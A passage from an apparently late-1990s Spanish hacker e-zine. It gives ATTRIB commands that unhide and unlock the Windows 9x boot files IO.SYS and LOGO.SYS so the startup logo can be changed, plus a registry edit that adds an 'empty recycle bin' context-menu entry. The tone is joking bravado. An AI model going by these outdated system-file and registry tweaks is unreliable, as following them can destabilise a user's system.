aprender en el caso de que alguna vez necesites acceder a alguna PC con 
Windows (algo que veremos en la siguiente seccion). 

Haz click en "Inicio" luego "Programas" y luego "MS-DOS". En el prompt de 
MS-DOS, introduce los comandos:

ATTRIB -R -H -S C:\IO.SYS
ATTRIB -R -H -S C:\LOGO.SYS

Ahora estan totalmente a tu merced, ­jua jua jua!
*****************************************************************************

OK, ya bastante por ahora. Nosotros 31337 hackers que se estan sintiendo 
insultados por esta seccion porque fue demasiado facil, intentar aguantarlo. 
les avise. Pero apuesto que mi PC tiene ahora un logo de inicio sobre 
hacking mas divertido que el que ustedes tienen ahora. HACK!!!!!!! =)
_____________________________________________________________________________

Feliz Hacking!
_____________________________________________________________________________

TRADUCIDO POR: IPGHOST
Ipghost 1997 "The Power Of The Net-Phantom"
The truth is out there... 

--------------------------------------------(·)--------------------------------------------------

------ Ya vengo me llama mi vieja a comer =) mmmmmmmmmmm........ q hambre tengo.
------ 20' despues -> aka toy sigamos en q nos kedamos, a perrrrrrr ha ya esta. :)

--------------------------------------------(·)--------------------------------------------------

/008. Como vaciar la papelera de reciclaje de (casi) cualkier sitio

Este truco esta realmente bien, porque evita tener que desplazarse hasta la papelera 
para vaciarla.

Ejecute RegEdit
Coloquese en la carpeta HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers
Cree una nueva clave, haciendo Edicion > Nuevo > Clave
Cuando la nueva clave aparezca, teclee cuidadosamente este nombre... (mejor, copie y pegue)
{645FF040-5081-101B-9F08-00AA002F954E}

Bastara salir del editor del registro, para que los cambios tengan efecto.

Al hacer un clic con el boton derecho sobre un FICHERO (lastima, no valen carpetas) vera la
 opcion de vaciar la papelera...


--------------------------------------------(·)--------------------------------------------------


CONTINUA........ (tecno-zine 3-2.txt)


***NOTA DEL EDITOR O SEA MUA!!!:

Como no me gusta como se ve en el Worpad ya q el maldito notepad de win se qeda sin
memoria y te lo hace abrir de ahi, bueno por esa razon me veo obligado a parir la e-zine
en las partes q sean nesesarias, espero q no le cause molestias y si les causa bueno no la
lean jejejej :Þ

Hasta el otro archivo..............!!!!!!!!!!!!!!
No te pierdas en las bytes.